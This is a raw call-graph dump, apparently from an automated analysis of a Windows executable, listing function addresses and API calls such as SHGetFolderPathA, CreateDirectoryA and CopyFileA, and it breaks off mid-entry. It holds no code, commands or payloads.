89683->89684 89696 b00240 89683->89696 89685 b86c20 10 API calls 89684->89685 89687 aff81c 89685->89687 89686 b86c20 10 API calls 89688 b00384 89686->89688 89691 aff83f 89687->89691 89752 b86b90 89687->89752 89689 b86b90 10 API calls 89688->89689 89692 b003a7 89688->89692 89689->89692 89693 abb260 GetLastError 89691->89693 89691->89696 89694 abb260 GetLastError 89692->89694 89695 b01a71 89692->89695 89713 aff86f std::_Throw_Cpp_error 89693->89713 89722 b003d7 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 89694->89722 89696->89686 89697 ab30f0 GetLastError 89697->89722 89698 ab30f0 GetLastError 89698->89713 89699 ab3200 GetLastError 89699->89713 89700 abb260 GetLastError 89700->89713 89701 abb260 GetLastError 89701->89722 89702 b86c20 10 API calls 89702->89713 89703 b86c20 10 API calls 89703->89722 89704 ad9820 6 API calls 89704->89713 89705 ad9820 6 API calls 89705->89722 89706 b86b90 10 API calls 89706->89713 89707 b86b90 10 API calls 89707->89722 89708 ab3200 GetLastError 89708->89722 89709 add0a8 16 API calls 89709->89722 89710 add0a8 16 API calls 89710->89713 89711 abaf80 GetLastError 89711->89713 89713->89696 89713->89698 89713->89699 89713->89700 89713->89702 89713->89704 89713->89706 89713->89710 89713->89711 89769 abb400 GetLastError 89713->89769 89770 abbae0 GetLastError std::_Throw_Cpp_error 89713->89770 89715 abb400 GetLastError 89715->89722 89717 abaf80 GetLastError 89717->89722 89718 b01d84 89719 b86c20 10 API calls 89718->89719 89720 b01eda 89719->89720 89721 b86b90 10 API calls 89720->89721 89723 b01efd 89720->89723 89721->89723 89722->89695 89722->89697 89722->89701 89722->89703 89722->89705 89722->89707 89722->89708 89722->89709 89722->89715 89722->89717 89722->89718 89764 ac19a0 89722->89764 89724 abb260 GetLastError 89723->89724 89725 b02910 89723->89725 89737 b01f2d std::_Throw_Cpp_error 89724->89737 89726 b86c20 10 API calls 89725->89726 89727 b02a49 89726->89727 89728 b86b90 10 API calls 89727->89728 89729 b02a6c 89727->89729 89728->89729 89730 abb260 GetLastError 89729->89730 89731 b0347f 89729->89731 89740 b02a9c std::_Throw_Cpp_error 89730->89740 89732 ab3200 GetLastError 89732->89737 89733 abb260 GetLastError 89733->89737 89734 ab3200 GetLastError 89734->89740 89735 abb260 GetLastError 89735->89740 89736 b86b90 10 API calls 89736->89737 89737->89725 89737->89732 89737->89733 89737->89736 89738 b86c20 10 API calls 89737->89738 89739 ad9820 6 API calls 89737->89739 89742 ab30f0 GetLastError 89737->89742 89744 add0a8 16 API calls 89737->89744 89748 abb400 GetLastError 89737->89748 89749 abaf80 GetLastError 89737->89749 89738->89737 89739->89737 89740->89731 89740->89734 89740->89735 89741 b86c20 10 API calls 89740->89741 89743 b86b90 10 API calls 89740->89743 89745 ad9820 6 API calls 89740->89745 89746 ab30f0 GetLastError 89740->89746 89747 add0a8 16 API calls 89740->89747 89750 abaf80 GetLastError 89740->89750 89751 abb400 GetLastError 89740->89751 89741->89740 89742->89737 89743->89740 89744->89737 89745->89740 89746->89740 89747->89740 89748->89737 89749->89737 89750->89740 89751->89740 89753 ad2b99 GetSystemTimePreciseAsFileTime 89752->89753 89754 b86bbd 89753->89754 89755 b86c02 89754->89755 89756 b86bc4 89754->89756 89759 ad2534 std::_Throw_Cpp_error 8 API calls 89755->89759 89757 b86c09 89756->89757 89758 b86bd0 CreateDirectoryA 89756->89758 89760 ad2534 std::_Throw_Cpp_error 8 API calls 89757->89760 89761 ad2baa GetSystemTimePreciseAsFileTime 89758->89761 89759->89757 89762 b86c1a 89760->89762 89763 b86bee 89761->89763 89763->89691 89765 ac19d0 89764->89765 89766 ac19f5 std::_Throw_Cpp_error 89764->89766 89765->89722 89767 aa7cf0 GetLastError 89766->89767 89768 ac1a2d 89767->89768 89769->89713 89770->89713 89771 b06ca0 89772 b06cea 89771->89772 89773 b86c20 10 API calls 89772->89773 89775 b096cb 89772->89775 89786 b08656 89772->89786 89774 b06da7 89773->89774 89777 b86b90 10 API calls 89774->89777 89779 b06dca 89774->89779 89781 ad9820 6 API calls 89775->89781 89782 b09ab4 89775->89782 89776 ad9820 6 API calls 89787 b08793 89776->89787 89777->89779 89778 b09dd0 89780 abb260 GetLastError 89779->89780 89783 b07a7c 89779->89783 89779->89786 89823 b06df9 std::_Throw_Cpp_error 89780->89823 89799 b097e0 89781->89799 89782->89778 89785 ad9820 6 API calls 89782->89785 89784 abb260 GetLastError 89783->89784 89783->89786 89825 b07aae std::_Throw_Cpp_error 89784->89825 89800 b09bd9 89785->89800 89786->89776 89787->89775 89789 abb260 GetLastError 89787->89789 89791 b08f74 89787->89791 89812 b08863 std::_Throw_Cpp_error 89789->89812 89790 b096b4 89795 add0a8 16 API calls 89790->89795 89791->89790 89796 abb260 GetLastError 89791->89796 89792 add0a8 16 API calls 89792->89782 89793 ab30f0 GetLastError 89793->89825 89795->89775 89816 b08fa6 std::_Throw_Cpp_error 89796->89816 89797 add0a8 16 API calls 89797->89778 89798 ab3200 GetLastError 89798->89825 89799->89782 89799->89792 89800->89778 89800->89797 89801 ab30f0 GetLastError 89801->89812 89802 ab30f0 GetLastError 89802->89816 89803 ab3200 GetLastError 89803->89812 89804 ab3200 GetLastError 89804->89816 89805 abaf80 GetLastError 89805->89823 89806 abb400 GetLastError 89806->89825 89807 abaf80 GetLastError 89807->89812 89808 abb400 GetLastError 89808->89823 89809 abb400 GetLastError 89809->89812 89810 abaf80 GetLastError 89810->89825 89811 b86c20 10 API calls 89811->89823 89812->89791 89812->89801 89812->89803 89812->89807 89812->89809 89813 b86c20 10 API calls 89813->89825 89814 b86b90 10 API calls 89814->89823 89815 abaf80 GetLastError 89815->89816 89816->89790 89816->89802 89816->89804 89816->89815 89817 abb400 GetLastError 89816->89817 89817->89816 89819 b86cf0 16 API calls 89819->89825 89820 ad9820 6 API calls 89820->89823 89821 b86b90 10 API calls 89821->89825 89822 ad9820 6 API calls 89822->89825 89823->89783 89823->89805 89823->89808 89823->89811 89823->89814 89823->89820 89824 add0a8 16 API calls 89823->89824 89827 ab30f0 89823->89827 89832 ab3200 89823->89832 89839 b86cf0 89823->89839 89824->89823 89825->89786 89825->89793 89825->89798 89825->89806 89825->89810 89825->89813 89825->89819 89825->89821 89825->89822 89826 add0a8 16 API calls 89825->89826 89826->89825 89828 ab316c std::_Throw_Cpp_error 89827->89828 89829 ab3114 89827->89829 89844 aa7b10 GetLastError std::ios_base::_Ios_base_dtor ___std_exception_destroy 89828->89844 89829->89823 89831 ab3191 89833 ab325c std::_Throw_Cpp_error 89832->89833 89836 ab3225 std::_Throw_Cpp_error 89832->89836 89845 aa7b10 GetLastError std::ios_base::_Ios_base_dtor ___std_exception_destroy 89833->89845 89834 ab3235 89834->89823 89836->89834 89846 aa7b10 GetLastError std::ios_base::_Ios_base_dtor ___std_exception_destroy 89836->89846 89838 ab32b7 89840 ad9820 6 API calls 89839->89840 89841 b86daf 89840->89841 89842 add0a8 16 API calls 89841->89842 89843 b86dbc 89841->89843 89842->89843 89843->89823 89844->89831 89845->89836 89846->89838 89847 b0a0c0 89852 b0a0fb std::_Throw_Cpp_error 89847->89852 89848 b0a9e0 89850 abaf80 GetLastError 89850->89852 89851 ab38b0 GetLastError 89851->89852 89852->89848 89852->89850 89852->89851 89853 b3f050 89852->89853 89854 b3f086 89853->89854 89893 ab7ef0 89854->89893 89856 b3f0af 89898 abaf80 89856->89898 89858 b3f174 89859 b3f192 SHGetFolderPathA 89858->89859 89886 b3f1bf std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error std::_Facet_Register 89859->89886 89861 b43423 89861->89852 89862 b4347b std::_Throw_Cpp_error 89863 aa7cf0 GetLastError 89862->89863 89866 b434c1 std::_Throw_Cpp_error 89863->89866 89868 aa7cf0 GetLastError 89866->89868 89872 b4351a std::_Throw_Cpp_error 89868->89872 89870 bead50 GetLastError GetLastError 89870->89886 89874 aa7cf0 GetLastError 89872->89874 89873 abaf80 GetLastError 89873->89886 89875 b4356f 89874->89875 89876 beb540 GetLastError GetLastError 89876->89886 89877 ab30f0 GetLastError 89877->89886 89878 ab3200 GetLastError 89878->89886 89879 b86c20 10 API calls 89879->89886 89880 b41bdf CreateDirectoryA 89880->89886 89881 ab7ef0 GetLastError 89881->89886 89882 abb0e0 GetLastError 89882->89886 89883 b41ec6 CreateDirectoryA 89883->89886 89884 ad9820 6 API calls 89884->89886 89885 ac6db0 GetLastError 89885->89886 89886->89861 89886->89862 89886->89866 89886->89870 89886->89872 89886->89873 89886->89876 89886->89877 89886->89878 89886->89879 89886->89880 89886->89881 89886->89882 89886->89883 89886->89884 89886->89885 89887 b86cf0 16 API calls 89886->89887 89888 ab3980 6 API calls 89886->89888 89890 b43590 17 API calls 89886->89890 89891 ae1628 14 API calls 89886->89891 89892 add0a8 16 API calls 89886->89892 89907 ae0fae 89886->89907 89917 b76710 89886->89917 89939 beae80 GetLastError GetLastError 89886->89939 89940 b76570 89886->89940 89954 b875c0 89886->89954 89967 abb430 89886->89967 89974 ab36c0 GetLastError std::_Throw_Cpp_error 89886->89974 89887->89886 89888->89886 89890->89886 89891->89886 89892->89886 89894 ab7f1d std::_Facet_Register 89893->89894 89895 ab8034 std::_Throw_Cpp_error 89893->89895 89894->89856 89895->89894 89975 aa7f90 GetLastError std::ios_base::_Ios_base_dtor 89895->89975 89897 ab8062 89899 abafb8 89898->89899 89900 abafc5 89898->89900 89901 ab7ef0 GetLastError 89899->89901 89902 abafda 89900->89902 89904 abb08c std::_Throw_Cpp_error 89900->89904 89901->89900 89976 ac6db0 89902->89976 89905 aa7cf0 GetLastError 89904->89905 89906 abb029 std::ios_base::_Ios_base_dtor 89905->89906 89906->89858 89908 ae0fbd 89907->89908 89909 ae1005 89907->89909 89911 ae0fc3 89908->89911 89914 ae0fe0 89908->89914 89982 ae101b 6 API calls __fread_nolock 89909->89982 89980 ad8c60 6 API calls __fread_nolock 89911->89980 89912 ae0fd3 89912->89886 89916 ae0ffe 89914->89916 89981 ad8c60 6 API calls __fread_nolock 89914->89981 89916->89886 89923 b767f0 89917->89923 89918 b769c0 89992 b9ac30 89918->89992 89920 ab85d0 8 API calls 89921 b769ed 89920->89921 89921->89886 89922 b76a02 89924 ad2b99 GetSystemTimePreciseAsFileTime 89922->89924 89923->89918 89923->89922 89983 b76b20 GetLastError 89923->89983 89926 b76a16 89924->89926 89928 b76b02 89926->89928 89929 b76a21 89926->89929 89927 b769bc 89927->89918 89927->89922 89930 ad2534 std::_Throw_Cpp_error 8 API calls 89928->89930 89931 b76a31 89929->89931 89932 b76b09 89929->89932 89930->89932 89933 b9ac30 2 API calls 89931->89933 89934 ad2534 std::_Throw_Cpp_error 8 API calls 89932->89934 89936 b76a4d std::_Throw_Cpp_error 89933->89936 89935 b76b1a 89934->89935 89937 ad2baa GetSystemTimePreciseAsFileTime 89936->89937 89938 b769d9 89937->89938 89938->89920 89939->89886 89941 ad2b99 GetSystemTimePreciseAsFileTime 89940->89941 89942 b765b4 89941->89942 89943 b765bf 89942->89943 89944 b766e8 89942->89944 89945 b766ef 89943->89945 89950 b765cf 89943->89950 89946 ad2534 std::_Throw_Cpp_error 8 API calls 89944->89946 89947 ad2534 std::_Throw_Cpp_error 8 API calls 89945->89947 89946->89945 89948 b76700 89947->89948 89949 ad2baa GetSystemTimePreciseAsFileTime 89951 b76629 89949->89951 89953 b7660e 89950->89953 90124 add25e 89950->90124 89951->89886 89953->89949 89955 ad9820 6 API calls 89954->89955 89956 b876c0 89955->89956 89957 b87739 89956->89957 90177 add5f6 89956->90177 89957->89886 89962 add5f6 14 API calls 89963 b876f0 89962->89963 90189 ae209f 89963->90189 89966 add0a8 16 API calls 89966->89957 89968 ab7ef0 GetLastError 89967->89968 89970 abb48d 89968->89970 90312 ac2100 89970->90312 89971 abb4f0 90316 abdb10 89971->90316 89973 abb503 89973->89886 89974->89886 89975->89897 89977 ac6df1 std::_Facet_Register 89976->89977 89978 ab7ef0 GetLastError 89977->89978 89979 ac6e23 89977->89979 89978->89979 89979->89906 89980->89912 89981->89912 89982->89912 89984 b76b5e 89983->89984 89985 b76c99 89983->89985 90035 ac9070 7 API calls 89984->90035 89986 b76c9f CopyFileA 89985->89986 89988 b76cf3 89986->89988 89989 b76cb3 GetLastError 89986->89989 89988->89927 89990 b76cba 89989->89990 89990->89927 89991 b76b8a 89991->89927 89993 b9be30 GetLastError 89992->89993 89994 b9ac4c 89993->89994 89995 b9ace2 89994->89995 89999 b9acf9 89994->89999 90000 b9ad1b 89994->90000 90013 b9acef 89994->90013 89996 be9cc0 GetLastError 89995->89996 89996->90013 89999->90000 90003 b9ad0b 89999->90003 90036 bea7f0 90000->90036 90001 b9ae49 90039 b9b2a0 90001->90039 90002 b9ade6 90004 be7500 2 API calls 90002->90004 90005 be9cc0 GetLastError 90003->90005 90004->90013 90005->90013 90007 b9ae61 90008 b9b2a0 2 API calls 90007->90008 90009 b9ae7b 90008->90009 90010 b9b2a0 2 API calls 90009->90010 90011 b9ae95 90010->90011 90012 b9b2a0 2 API calls 90011->90012 90014 b9aeaf 90012->90014 90013->89938 90014->90013 90015 b9b2a0 2 API calls 90014->90015 90016 b9af69 90015->90016 90050 b9b500 90016->90050 90019 b9af95 90020 be7500 2 API calls 90019->90020 90020->90013 90021 b9afb3 90021->90013 90022 be7500 2 API calls 90021->90022 90023 b9b011 90022->90023 90054 b9b640 90023->90054 90025 b9b1f1 90025->90013 90027 be7500 2 API calls 90025->90027 90026 b9b02b 90029 b9b096 90026->90029 90030 b9b640 2 API calls 90026->90030 90034 b9b0a9 90026->90034 90028 b9b22d 90027->90028 90063 b9bb00 90028->90063 90032 be7500 2 API calls 90029->90032 90029->90034 90030->90029 90032->90034 90033 be7500 2 API calls 90033->90034 90034->90025 90034->90033 90035->89991 90037 b9be30 GetLastError 90036->90037 90038 b9ade0 90037->90038 90038->90001 90038->90002 90041 b9b2b6 90039->90041 90040 b9b2e7 90040->90007 90041->90040 90044 b9b358 90041->90044 90049 b9b374 90041->90049 90043 b9b3dd 90046 be7500 2 API calls 90043->90046 90045 be7500 2 API calls 90044->90045 90047 b9b365 90045->90047 90048 b9b413 90046->90048 90047->90007 90048->90007 90068 bbbed0 GetLastError 90049->90068 90051 b9b52c 90050->90051 90069 bdd350 90051->90069 90053 b9af8e 90053->90019 90053->90021 90055 b9b656 90054->90055 90060 b9b73a 90054->90060 90056 b9b640 2 API calls 90055->90056 90058 b9b694 90055->90058 90055->90060 90057 b9b6b6 90056->90057 90059 b9b640 2 API calls 90057->90059 90057->90060 90058->90060 90061 be7500 2 API calls 90058->90061 90059->90058 90060->90026 90062 b9b72b 90061->90062 90062->90026 90064 b9bb21 90063->90064 90065 b9bb15 90063->90065 90066 be9cc0 GetLastError 90064->90066 90067 b9bb35 90064->90067 90065->90013 90066->90067 90067->90013 90068->90043 90071 bdd373 90069->90071 90070 bdd510 90070->90053 90071->90070 90079 bdd4e7 90071->90079 90083 bdfc20 90071->90083 90072 be9cc0 GetLastError 90074 bdd4f4 90072->90074 90075 be9cc0 GetLastError 90074->90075 90076 bdd4fd 90075->90076 90076->90053 90078 bdd3d3 90080 bdd40a 90078->90080 90082 c6301a GetLastError 90078->90082 90079->90072 90080->90079 90081 bdd4ba 90080->90081 90098 be03c0 90080->90098 90081->90053 90082->90080 90088 bdfc54 90083->90088 90084 bdfce4 90085 bdff4c 90084->90085 90086 bdfd12 90084->90086 90087 be9cc0 GetLastError 90085->90087 90091 bdfdab 90086->90091 90095 be9cc0 GetLastError 90086->90095 90089 bdff52 90087->90089 90088->90084 90088->90089 90090 bdfccd 90088->90090 90089->90078 90092 be9cc0 GetLastError 90090->90092 90094 be9cc0 GetLastError 90091->90094 90097 bdfe58 90091->90097 90093 bdfcd8 90092->90093 90093->90078 90096 bdff40 90094->90096 90095->90091 90096->90078 90097->90078 90099 be03cc 90098->90099 90100 be3d90 GetLastError 90099->90100 90101 be03fe 90100->90101 90102 be15e0 GetLastError 90101->90102 90104 be0417 90102->90104 90103 be3780 GetLastError 90105 be0446 90103->90105 90104->90103 90106 be045b 90105->90106 90110 be2cd0 90105->90110 90107 be9cc0 GetLastError 90106->90107 90108 be0464 90107->90108 90108->90079 90111 be2cdc 90110->90111 90112 be3380 GetLastError 90111->90112 90113 be2cf3 90112->90113 90120 be3460 90113->90120 90116 be9cc0 GetLastError 90117 be2d25 90116->90117 90118 be9cc0 GetLastError 90117->90118 90119 be2d2b 90118->90119 90119->90106 90121 be2d0a 90120->90121 90122 be3471 90120->90122 90121->90116 90122->90121 90123 be38b0 GetLastError 90122->90123 90123->90122 90125 add26c 90124->90125 90126 add276 90124->90126 90127 aeb9d0 GetLastError 90125->90127 90137 add1a7 90126->90137 90130 add273 90127->90130 90130->89953 90133 add2a4 90135 add2c2 90133->90135 90136 aeb01a ___std_exception_destroy GetLastError 90133->90136 90135->89953 90136->90135 90150 ad95ae 90137->90150 90140 add1cb 90142 add18a 90140->90142 90163 add0d8 90142->90163 90144 add1a2 90144->90133 90145 aeb9d0 90144->90145 90146 aeb9de 90145->90146 90147 aeb9f4 90146->90147 90148 aeb9e2 GetLastError 90146->90148 90147->90133 90149 aeb9ee __dosmaperr 90148->90149 90149->90133 90151 ad95cc 90150->90151 90152 ad95c5 90150->90152 90151->90152 90157 aea12d 90151->90157 90152->90140 90156 aeb50e GetLastError GetProcAddress std::_Locinfo::_Locinfo_dtor 90152->90156 90156->90140 90158 ad9603 90157->90158 90159 aea140 90157->90159 90161 aea18b 6 API calls __fread_nolock 90158->90161 90159->90158 90162 af2392 6 API calls 3 library calls 90159->90162 90161->90152 90162->90158 90164 add0e6 90163->90164 90165 add100 90163->90165 90174 add1e6 GetLastError ___std_exception_destroy 90164->90174 90167 add107 90165->90167 90169 add126 __fread_nolock 90165->90169 90170 add0f0 __dosmaperr 90167->90170 90175 add200 GetLastError 90167->90175 90171 add13c GetLastError 90169->90171 90172 add162 __fread_nolock 90169->90172 90176 add200 GetLastError 90169->90176 90170->90144 90171->90170 90172->90170 90172->90171 90174->90170 90175->90170 90176->90172 90178 add609 __fread_nolock 90177->90178 90192 add34d 90178->90192 90181 ad899c __fread_nolock 6 API calls 90182 add62b 90181->90182 90183 ad93ab 90182->90183 90184 ad93be __fread_nolock 90183->90184 90217 ad8cc1 90184->90217 90187 ad899c __fread_nolock 6 API calls 90188 ad93d6 90187->90188 90188->89962 90261 ae20bc 90189->90261 90194 add359 __fread_nolock 90192->90194 90193 add35f 90210 ad8be3 5 API calls __fread_nolock 90193->90210 90194->90193 90197 add3a2 __fread_nolock 90194->90197 90196 add37a 90196->90181 90201 add4d0 90197->90201 90199 add3c4 90211 add3ed 6 API calls __fread_nolock 90199->90211 90202 add4f6 90201->90202 90203 add4e3 90201->90203 90212 add3f7 90202->90212 90203->90199 90205 ad9a91 14 API calls 90207 add547 90205->90207 90206 add519 90206->90205 90209 add5a7 90206->90209 90208 ae263d 7 API calls 90207->90208 90208->90209 90209->90199 90210->90196 90211->90196 90213 add408 90212->90213 90215 add460 90212->90215 90213->90215 90216 ae25fd 7 API calls __fread_nolock 90213->90216 90215->90206 90216->90215 90218 ad8ccd __fread_nolock 90217->90218 90219 ad8cf5 __fread_nolock 90218->90219 90220 ad8cd4 90218->90220 90226 ad8dd0 90219->90226 90229 ad8be3 5 API calls __fread_nolock 90220->90229 90222 ad8ced 90222->90187 90231 ad8e02 90226->90231 90228 ad8d0f 90230 ad8d37 6 API calls __fread_nolock 90228->90230 90229->90222 90230->90222 90232 ad8e39 90231->90232 90233 ad8e11 90231->90233 90234 aea1e9 __fread_nolock 6 API calls 90232->90234 90247 ad8be3 5 API calls __fread_nolock 90233->90247 90236 ad8e42 90234->90236 90244 ae25df 90236->90244 90239 ad8eec 90248 ad916e 7 API calls 3 library calls 90239->90248 90241 ad8e2c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 90241->90228 90242 ad8f03 90242->90241 90249 ad8fa3 7 API calls 2 library calls 90242->90249 90250 ae23f7 90244->90250 90247->90241 90248->90241 90249->90241 90252 ae2403 __fread_nolock 90250->90252 90251 ad8e60 90251->90239 90251->90241 90251->90242 90252->90251 90253 ae2446 90252->90253 90255 ae248c 90252->90255 90259 ad8be3 5 API calls __fread_nolock 90253->90259 90256 ae24b3 90255->90256 90257 ae251c __fread_nolock 7 API calls 90255->90257 90260 ae2514 GetLastError GetLastError GetProcAddress 90256->90260 90257->90256 90259->90251 90260->90251 90263 ae20c8 __fread_nolock 90261->90263 90262 ae20b7 90262->89966 90263->90262 90264 ae2112 __fread_nolock 90263->90264 90266 ae20db 90263->90266 90270 ae1ec6 90264->90270 90278 ad8c60 6 API calls __fread_nolock 90266->90278 90272 ae1ef5 90270->90272 90274 ae1ed8 __fread_nolock 90270->90274 90279 ae2151 6 API calls __fread_nolock 90272->90279 90273 ae1ee5 90305 ad8c60 6 API calls __fread_nolock 90273->90305 90274->90272 90274->90273 90276 aea1e9 __fread_nolock 6 API calls 90274->90276 90280 ae8910 90274->90280 90306 adceeb 6 API calls __fread_nolock 90274->90306 90276->90274 90278->90262 90279->90262 90281 ae8922 __dosmaperr 90280->90281 90282 ae893a 90280->90282 90281->90274 90282->90281 90283 ae8988 __dosmaperr 90282->90283 90284 ae89b8 90282->90284 90311 ad8c60 6 API calls __fread_nolock 90283->90311 90286 ae89d1 90284->90286 90288 ae8a0c std::_Locinfo::_Locinfo_dtor 90284->90288 90289 ae89de __dosmaperr 90284->90289 90287 ae89fa 90286->90287 90286->90289 90290 af3be3 __fread_nolock 6 API calls 90287->90290 90291 aeb01a ___std_exception_destroy GetLastError 90288->90291 90307 ad8c60 6 API calls __fread_nolock 90289->90307 90299 ae8b58 __fread_nolock 90290->90299 90292 ae8a26 90291->90292 90294 aeb01a ___std_exception_destroy GetLastError 90292->90294 90295 ae8a2d 90294->90295 90304 ae89f5 __fread_nolock __dosmaperr 90295->90304 90308 ae25fd 7 API calls __fread_nolock 90295->90308 90296 aeb01a ___std_exception_destroy GetLastError 90296->90281 90298 ae8b88 90298->90274 90299->90298 90300 ae8c0d 90299->90300 90301 ae8c24 90299->90301 90299->90304 90309 ae8622 8 API calls 2 library calls 90300->90309 90301->90304 90310 ae8468 7 API calls __fread_nolock 90301->90310 90304->90296 90305->90272 90306->90274 90307->90304 90308->90287 90309->90304 90310->90304 90311->90281 90313 ac215f 90312->90313 90343 ae133b 90313->90343 90315 ac225f 90315->89971 90317 abdb56 90316->90317 90319 abde3d 90316->90319 90347 abebb0 GetLastError 90317->90347 90341 abdf4f std::ios_base::_Ios_base_dtor 90319->90341 90352 abeda0 7 API calls 2 library calls 90319->90352 90321 abdba4 90342 abdc86 std::ios_base::_Ios_base_dtor 90321->90342 90348 abeda0 7 API calls 2 library calls 90321->90348 90322 ab7ef0 GetLastError 90340 abdd01 std::ios_base::_Ios_base_dtor 90322->90340 90323 abdee2 90353 aa75c0 GetLastError std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 90323->90353 90326 abdcec 90330 ab7ef0 GetLastError 90326->90330 90327 abdd82 90333 ab7ef0 GetLastError 90327->90333 90327->90340 90328 abdf06 90354 abf440 7 API calls 2 library calls 90328->90354 90329 abdc1c 90349 aa75c0 GetLastError std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 90329->90349 90330->90340 90333->90340 90334 abdc40 90350 abf440 7 API calls 2 library calls 90334->90350 90336 abdf1f 90336->90340 90355 aa7a20 GetLastError ___std_exception_destroy 90336->90355 90338 abdc56 90338->90340 90351 aa7a20 GetLastError ___std_exception_destroy 90338->90351 90340->89973 90341->90322 90341->90340 90342->90326 90342->90327 90342->90340 90344 ae1346 90343->90344 90345 aea12d __Getctype 6 API calls 90344->90345 90346 ae1356 90345->90346 90346->90315 90347->90321 90348->90329 90349->90334 90350->90338 90351->90342 90352->90323 90353->90328 90354->90336 90355->90341 90356 b0aa00 90403 b0aa3a std::_Throw_Cpp_error 90356->90403 90357 b18aa7 90359 b0ab5e 90360 b1719c std::_Throw_Cpp_error 90359->90360 90361 b0ad04 std::_Throw_Cpp_error 90359->90361 90646 b4a180 90359->90646 90365 b171f8 std::_Throw_Cpp_error 90360->90365 90362 b0ad61 std::_Throw_Cpp_error 90361->90362 90363 b4a180 43 API calls 90362->90363 90366 b0af28 std::_Throw_Cpp_error 90363->90366 90364 b4a180 43 API calls 90364->90365 90365->90364 90370 b1747d std::_Throw_Cpp_error 90365->90370 90367 b0af88 std::_Throw_Cpp_error 90366->90367 90369 b4a180 43 API calls 90367->90369 90368 b4a180 43 API calls 90368->90370 90371 b0b1a7 std::_Throw_Cpp_error 90369->90371 90370->90368 90375 b17702 std::_Throw_Cpp_error 90370->90375 90372 b0b207 std::_Throw_Cpp_error 90371->90372 90374 b4a180 43 API calls 90372->90374 90373 b4a180 43 API calls 90373->90375 90376 b0b3ce std::_Throw_Cpp_error 90374->90376 90375->90373 90380 b17987 std::_Throw_Cpp_error 90375->90380 90377 b0b42e std::_Throw_Cpp_error 90376->90377 90378 b4a180 43 API calls 90377->90378 90381 b0b5f5 std::_Throw_Cpp_error 90378->90381 90379 b4a180 43 API calls 90379->90380 90380->90379 90385 b17bb4 std::_Throw_Cpp_error 90380->90385 90382 b0b655 std::_Throw_Cpp_error 90381->90382 90384 b4a180 43 API calls 90382->90384 90383 b4a180 43 API calls 90383->90385 90386 b0b81c std::_Throw_Cpp_error 90384->90386 90385->90383 90390 b17de1 std::_Throw_Cpp_error 90385->90390 90387 b0b87c std::_Throw_Cpp_error 90386->90387 90388 b4a180 43 API calls 90387->90388 90391 b0ba43 std::_Throw_Cpp_error 90388->90391 90389 b4a180 43 API calls 90389->90390 90390->90389 90395 b1800e std::_Throw_Cpp_error 90390->90395 90392 b0baa3 std::_Throw_Cpp_error 90391->90392 90394 b4a180 43 API calls 90392->90394 90393 b4a180 43 API calls 90393->90395 90396 b0bc6a std::_Throw_Cpp_error 90394->90396 90395->90393 90400 b1823b std::_Throw_Cpp_error 90395->90400 90397 b0bcca std::_Throw_Cpp_error 90396->90397 90399 b4a180 43 API calls 90397->90399 90398 b4a180 43 API calls 90398->90400 90401 b0be91 std::_Throw_Cpp_error 90399->90401 90400->90398 90400->90403 90402 b0bef1 std::_Throw_Cpp_error 90401->90402 90404 b4a180 43 API calls 90402->90404 90403->90357 90403->90359 90405 b4a180 43 API calls 90403->90405 90406 b0c0b8 std::_Throw_Cpp_error 90404->90406 90405->90403 90407 b0c118 std::_Throw_Cpp_error 90406->90407 90408 b4a180 43 API calls 90407->90408 90409 b0c2df std::_Throw_Cpp_error 90408->90409 90410 b0c33f std::_Throw_Cpp_error 90409->90410 90411 b4a180 43 API calls 90410->90411 90412 b0c506 std::_Throw_Cpp_error 90411->90412 90413 b0c566 std::_Throw_Cpp_error 90412->90413 90414 b4a180 43 API calls 90413->90414 90415 b0c72d std::_Throw_Cpp_error 90414->90415 90416 b0c78d std::_Throw_Cpp_error 90415->90416 90417 b4a180 43 API calls 90416->90417 90418 b0c954 std::_Throw_Cpp_error 90417->90418 90419 b0c9b4 std::_Throw_Cpp_error 90418->90419 90420 b4a180 43 API calls 90419->90420 90421 b0cb7b std::_Throw_Cpp_error 90420->90421 90422 b0cbdb std::_Throw_Cpp_error 90421->90422 90423 b4a180 43 API calls 90422->90423 90424 b0cda2 std::_Throw_Cpp_error 90423->90424 90425 b0ce02 std::_Throw_Cpp_error 90424->90425 90426 b4a180 43 API calls 90425->90426 90427 b0cfc9 std::_Throw_Cpp_error 90426->90427 90428 b0d029 std::_Throw_Cpp_error 90427->90428 90429 b4a180 43 API calls 90428->90429 90430 b0d1f0 std::_Throw_Cpp_error 90429->90430 90431 b0d250 std::_Throw_Cpp_error 90430->90431 90432 b4a180 43 API calls 90431->90432 90433 b0d46f std::_Throw_Cpp_error 90432->90433 90434 b0d4cf std::_Throw_Cpp_error 90433->90434 90435 b4a180 43 API calls 90434->90435 90436 b0d696 std::_Throw_Cpp_error 90435->90436 90437 b0d6f6 std::_Throw_Cpp_error 90436->90437 90438 b4a180 43 API calls 90437->90438 90439 b0d8bd std::_Throw_Cpp_error 90438->90439 90440 b0d91d std::_Throw_Cpp_error 90439->90440 90441 b4a180 43 API calls 90440->90441 90442 b0dae4 std::_Throw_Cpp_error 90441->90442 90443 b0db44 std::_Throw_Cpp_error 90442->90443 90444 b4a180 43 API calls 90443->90444 90445 b0dd0b std::_Throw_Cpp_error 90444->90445 90446 b0dd6b std::_Throw_Cpp_error 90445->90446 90447 b4a180 43 API calls 90446->90447 90448 b0df32 std::_Throw_Cpp_error 90447->90448 90449 b0df92 std::_Throw_Cpp_error 90448->90449 90450 b4a180 43 API calls 90449->90450 90647 ad59b0 90646->90647 90648 b4a1db SHGetFolderPathA 90647->90648 90649 b4a20f std::_Throw_Cpp_error 90648->90649 90716 b4b343 std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error 90649->90716 91002 b65f80 90649->91002 90651 b4a251 90652 b4a26b 90651->90652 90733 b4a2d5 std::_Throw_Cpp_error 90651->90733 90655 ab85d0 8 API calls 90652->90655 90653 b4b334 90656 ab85d0 8 API calls 90653->90656 90654 b4a277 90657 ab85d0 8 API calls 90654->90657 90655->90654 90656->90716 90661 b4a283 90657->90661 90658 b4da87 90659 ab7ef0 GetLastError 90658->90659 90660 b4dafa 90659->90660 90662 abaf80 GetLastError 90660->90662 90661->90359 90663 b4dbc2 90662->90663 90664 b4dbe0 SHGetFolderPathA 90663->90664 90665 b4dc1a std::_Throw_Cpp_error 90664->90665 90666 b65f80 GetLastError 90665->90666 90673 b4e0b3 90665->90673 90667 b4dc72 90666->90667 90668 b4dc94 90667->90668 90700 b4dcab std::_Throw_Cpp_error 90667->90700 90669 